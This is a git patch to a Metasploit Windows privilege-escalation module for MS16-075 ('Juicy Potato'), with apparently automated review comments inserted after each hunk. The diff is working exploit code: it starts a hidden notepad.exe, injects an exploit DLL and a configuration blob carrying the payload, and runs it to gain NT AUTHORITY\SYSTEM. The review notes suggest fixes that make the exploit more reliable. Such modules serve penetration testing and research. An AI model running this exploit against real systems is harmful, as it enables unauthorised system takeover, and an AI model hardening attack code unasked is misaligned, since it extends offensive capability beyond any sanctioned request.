From 3a865a0c0555a0a92dce29bed248bfc02926d3b5 Mon Sep 17 00:00:00 2001
From: phra
Date: Sat, 12 Jan 2019 04:03:26 +0100
Subject: [PATCH] feat: spawn as NT AUTHORITY\SYSTEM
---
 .../local/ms16_075_reflection_juicy.rb | 91 +++++++++++--------
 1 file changed, 53 insertions(+), 38 deletions(-)
diff --git a/modules/exploits/windows/local/ms16_075_reflection_juicy.rb b/modules/exploits/windows/local/ms16_075_reflection_juicy.rb
index 31ef7a7ead..bc6e4ccaea 100644
--- a/modules/exploits/windows/local/ms16_075_reflection_juicy.rb
+++ b/modules/exploits/windows/local/ms16_075_reflection_juicy.rb
@@ -30,7 +30,8 @@ class MetasploitModule < Msf::Exploit::Local
 'breenmachine', # Rotten Potato NG!
 'decoder', # Lonely / Juicy Potato
 'ohpe', # Juicy Potato
- 'phra' # MSF Module
+ 'phra', # MSF Module
+ 'lupman' # MSF Module
 ],
 'Arch' => [ARCH_X86, ARCH_X64],
 'Platform' => 'win',
@@ -38,14 +39,13 @@ class MetasploitModule < Msf::Exploit::Local
 'DefaultOptions' =>
 {
 'EXITFUNC' => 'none',
- 'WfsDelay' => '0',
- 'DisablePayloadHandler' => 'true'
+ 'WfsDelay' => '20'
 },
 'Targets' =>
 [
- ['Automatic', {}],
- ['Windows x86', { 'Arch' => ARCH_X86 }],
- ['Windows x64', { 'Arch' => ARCH_X64 }]
+ ['Automatic', {}]
+ #['Windows x86', { 'Arch' => ARCH_X86 }],
+ #['Windows x64', { 'Arch' => ARCH_X64 }]
 ],
 'Payload' =>
 {
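Review bot: The 'Windows x86' and 'Windows x64' entries in the Targets array are kept as commented-out lines instead of being deleted, so dead code lingers in the module; since the DLL variant is now chosen from `@payload_arch` in the exploit method (hunk at line 149), the two `#[...]` lines should go and `['Automatic', {}]` should stay as the only target. A short comment on that single target would document the new contract, e.g. `# Single target: the x86/x64 DLL is picked from the selected payload's architecture.` Changing 'WfsDelay' from '0' to '20' and dropping 'DisablePayloadHandler' also changes runtime behaviour (a handler is now started and waited on), which the commit message does not mention.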
@@ -67,16 +67,16 @@ class MetasploitModule < Msf::Exploit::Local
 register_options(
 [
- OptString.new('CLSID', [ true, 'Set CLSID value of the DCOM to trigger', '{4991d34b-80a1-4291-83b6-3328366b9097}' ]),
- OptPort.new('DCOM_PORT', [ true, 'Set listening port for MITM DCOM communication', 6666 ])
+ OptString.new('CLSID', [ true, 'Set CLSID value of the DCOM to trigger', '{4991d34b-80a1-4291-83b6-3328366b9097}' ])
 ])
 register_advanced_options(
 [
- OptAddress.new('RPC_IP', [ true, 'Set RPC_IP value', '127.0.0.1' ]),
- OptPort.new('RPC_PORT', [ true, 'Set RPC_PORT value', 135 ]),
- OptAddress.new('DCOM_IP', [ true, 'Set DCOM_IP value', '127.0.0.1' ]),
- OptString.new('LOGFILE', [ false, 'Set the log file' ]),
+ OptAddress.new('RpcServerHost', [ true, 'Set RPC server target host', '127.0.0.1' ]),
+ OptPort.new('RpcServerPort', [ true, 'Set RPC server target port', 135 ]),
+ OptAddress.new('ListeningAddress', [ true, 'Set listening address for MITM DCOM communication', '127.0.0.1' ]),
+ OptPort.new('ListeningPort', [ true, 'Set listening port for MITM DCOM communication', 7777 ]),
+ OptString.new('LogFile', [ false, 'Set the log file' ])
 ])
 end
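Review bot: CLSID remains a free-form OptString whose value is later copied verbatim into the NUL-delimited configuration blob (hunk at line 180), so a malformed value such as missing braces is only noticed inside the injected code rather than at option-validation time. A format check before any process is launched would fail fast, e.g. `fail_with(Failure::BadConfig, 'CLSID must look like {xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}') unless datastore['CLSID'].to_s.match?(/\A\{\h{8}-\h{4}-\h{4}-\h{4}-\h{12}\}\z/)`. Renaming RPC_IP/RPC_PORT/DCOM_IP/LOGFILE to RpcServerHost/RpcServerPort/ListeningAddress/LogFile also breaks existing resource scripts that set the old names, which deserves a line in the commit description.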
@@ -98,17 +98,35 @@ class MetasploitModule < Msf::Exploit::Local
 return my_target
 end
- def verify_arch(my_target)
- if my_target["Arch"] != sysinfo["Architecture"]
- print_error("Assigned Target Arch = #{my_target.opts['Arch']}")
- print_error("Actual Target Arch = #{sysinfo['Architecture']}")
- fail_with(Failure::BadConfig, "Assigned Arch does not match reality")
- end
- if client.arch != sysinfo["Architecture"]
- fail_with(Failure::BadConfig, "Session/Target Arch mismatch; WOW64 not supported")
+ # Creates a temp notepad.exe to inject payload in to given the payload
+ def create_temp_proc()
+ windir = client.sys.config.getenv('windir')
+ # Select path of executable to run depending the architecture
+ if sysinfo["Architecture"] == ARCH_X64 and client.arch == ARCH_X86 and @payload_arch.first == ARCH_X64
+ cmd = "#{windir}\\Sysnative\\notepad.exe"
+ elsif sysinfo["Architecture"] == ARCH_X64 and client.arch == ARCH_X64 and @payload_arch.first == ARCH_X86
+ cmd = "#{windir}\\SysWOW64\\notepad.exe"
 else
- vprint_good("Current payload and target Arch match....")
+ cmd = "#{windir}\\System32\\notepad.exe"
 end
+ begin
+ proc = client.sys.process.execute(cmd, nil, {'Hidden' => true})
+ rescue Rex::Post::Meterpreter::RequestError
+ return nil
+ end
+
+ return proc
+ end
+
+ def create_temp_proc_stage2()
+ windir = client.sys.config.getenv('windir')
+ # Select path of executable to run depending the architecture
+ if sysinfo["Architecture"] == ARCH_X64 and @payload_arch.first == ARCH_X86
+ cmd = "#{windir}\\SysWOW64\\notepad.exe"
+ else
+ cmd = "#{windir}\\System32\\notepad.exe"
+ end
+ return cmd
 end
 def check
@@ -124,9 +142,6 @@ class MetasploitModule < Msf::Exploit::Local
 if privs.include?('SeImpersonatePrivilege')
 return Exploit::CheckCode::Appears
 end
- if privs.include?('SeAssignPrimaryToken')
- return Exploit::CheckCode::Appears
- end
 return Exploit::CheckCode::Safe
 end
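Review bot: create_temp_proc returns nil from its `rescue Rex::Post::Meterpreter::RequestError` branch, but the caller in the exploit method (hunk at line 149) goes straight to `client.sys.process.open(notepad_process.pid, ...)`, so a failed launch surfaces as a NoMethodError on nil rather than a clear failure; add `fail_with(Failure::Unknown, 'Unable to launch the host process') unless notepad_process` after the `create_temp_proc` call, or let the RequestError propagate instead of swallowing it. Style-wise the conditions use `and` where `&&` is idiomatic, the local `proc` shadows Kernel#proc, and the empty `()` on both `def` lines is unnecessary. Both methods repeat the `client.sys.config.getenv('windir')` lookup and the `"#{windir}\\<dir>\\notepad.exe"` construction, which could be one private helper taking the system directory name. create_temp_proc_stage2 returns a path string rather than a process, so its name and the copied comment mislead; a comment such as `# Returns the notepad.exe path that is handed to the injected DLL through the configuration blob; no process is started here.` would document it.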
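Review bot: check no longer treats SeAssignPrimaryToken as sufficient, yet the failure message in the exploit method (hunk at line 149) still reads 'User does not have SeImpersonate or SeAssignPrimaryToken Privilege', so users are pointed at a privilege the module does not test. Either shorten that message to `fail_with(Failure::NoAccess, 'User does not have SeImpersonatePrivilege')` or restore the branch. If the drop is intentional, a one-line comment above the remaining test, e.g. `# Only SeImpersonatePrivilege is checked; SeAssignPrimaryToken alone is no longer accepted`, would record that, since the commit message does not say why.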
@@ -134,24 +149,24 @@ class MetasploitModule < Msf::Exploit::Local
 if is_system?
 fail_with(Failure::None, 'Session is already elevated')
 end
+ @payload_name = datastore['PAYLOAD']
+ @payload_arch = framework.payloads.create(@payload_name).arch
 my_target = assign_target
- print_status("#{my_target['Arch']}")
- verify_arch(my_target)
 if check == Exploit::CheckCode::Safe
- fail_with(Failure::NoAccess, 'User does not have SeImpersonate or SeAssignPrimaryToken Privilege or Windows version not supported')
+ fail_with(Failure::NoAccess, 'User does not have SeImpersonate or SeAssignPrimaryToken Privilege')
 end
- if my_target.opts['Arch'] == 'x64'
+ if @payload_arch.first == ARCH_X64
 dll_file_name = 'juicypotato.x64.dll'
 vprint_status("Assigning payload juicypotato.x64.dll")
- elsif my_target.opts['Arch'] == 'x86'
+ elsif @payload_arch.first == ARCH_X86
 dll_file_name = 'juicypotato.x86.dll'
 vprint_status("Assigning payload juicypotato.x86.dll")
 else
 fail_with(Failure::BadConfig, "Unknown target arch; unable to assign exploit code")
 end
 print_status('Launching notepad to host the exploit...')
- notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)
- #notepad_process = client.sys.process.execute('cmd.exe', nil, 'Hidden' => true)
+ notepad_process = create_temp_proc
+ cmd = create_temp_proc_stage2
 begin
 process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
 print_good("Process #{process.pid} launched.")
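Review bot: `my_target = assign_target` is kept although both uses of my_target in this method (`verify_arch(my_target)` and `my_target.opts['Arch']`) are removed, so unless code past the hunk reads it the assignment is dead and should be dropped (and assign_target reviewed for removal too). `@payload_name` is used once, on the very next line, so a local or an inlined `datastore['PAYLOAD']` avoids an instance variable that outlives the call; `@payload_arch` is legitimately shared with create_temp_proc. The `else` message 'Unknown target arch' now describes the payload's architecture rather than a target, and the code relies on `framework.payloads.create` never returning nil here — I cannot confirm from the hunk that the framework's option validation guarantees that, so a short comment stating the assumption would help. The enclosing exploit method ends outside the hunk.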
@@ -165,13 +180,13 @@ class MetasploitModule < Msf::Exploit::Local
 print_status("Injecting exploit into #{process.pid}...")
 exploit_mem, offset = inject_dll_into_process(process, library_path)
 print_status("Exploit injected. Injecting exploit configuration into #{process.pid}...")
- #payload_mem = inject_into_process(process, payload.encoded)
- configuration = "#{datastore['LOGFILE']}\x00"
+ configuration = "#{datastore['LogFile']}\x00"
+ configuration += "#{cmd}\x00"
 configuration += "#{datastore['CLSID']}\x00"
- configuration += "#{datastore['DCOM_PORT']}\x00"
- configuration += "#{datastore['RPC_IP']}\x00"
- configuration += "#{datastore['RPC_PORT']}\x00"
- configuration += "#{datastore['DCOM_IP']}\x00"
+ configuration += "#{datastore['ListeningPort']}\x00"
+ configuration += "#{datastore['RpcServerHost']}\x00"
+ configuration += "#{datastore['RpcServerPort']}\x00"
+ configuration += "#{datastore['ListeningAddress']}\x00"
 configuration += "#{payload.encoded.length}\x00"
 configuration += payload.encoded
 payload_mem = inject_into_process(process, configuration)
@@ -179,6 +194,6 @@ class MetasploitModule < Msf::Exploit::Local
 # we want invoked on successful exploitation.
 print_status('Configuration injected. Executing exploit...')
 process.thread.create(exploit_mem + offset, payload_mem)
- print_good('Exploit finished, check incognito module.')
+ print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
 end
 end
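Review bot: The configuration blob is assembled with eight `+=` concatenations onto a string created by interpolation, so the field order that the consumer of the blob depends on is spread over nine lines with no comment, each `+=` allocates a fresh string, and the final `+= payload.encoded` appends binary data to a UTF-8 string — that raises Encoding::CompatibilityError if any earlier field (LogFile, or the windir-derived `cmd` on a localized system) contains non-ASCII characters, and I cannot confirm from the hunk that this case is excluded. Building the fields as an array, joining them with NUL and forcing binary encoding before appending the payload keeps the order in one place and removes the encoding hazard. The enclosing exploit method starts outside the hunk.
```ruby
    # NUL-terminated fields; keep this order in sync with whatever parses the injected configuration.
    fields = [
      datastore['LogFile'], cmd, datastore['CLSID'],
      datastore['ListeningPort'], datastore['RpcServerHost'],
      datastore['RpcServerPort'], datastore['ListeningAddress'],
      payload.encoded.length
    ]
    configuration = fields.map { |field| "#{field}\x00" }.join.b
    configuration << payload.encoded
    # … unchanged: payload_mem = inject_into_process(process, configuration) …
```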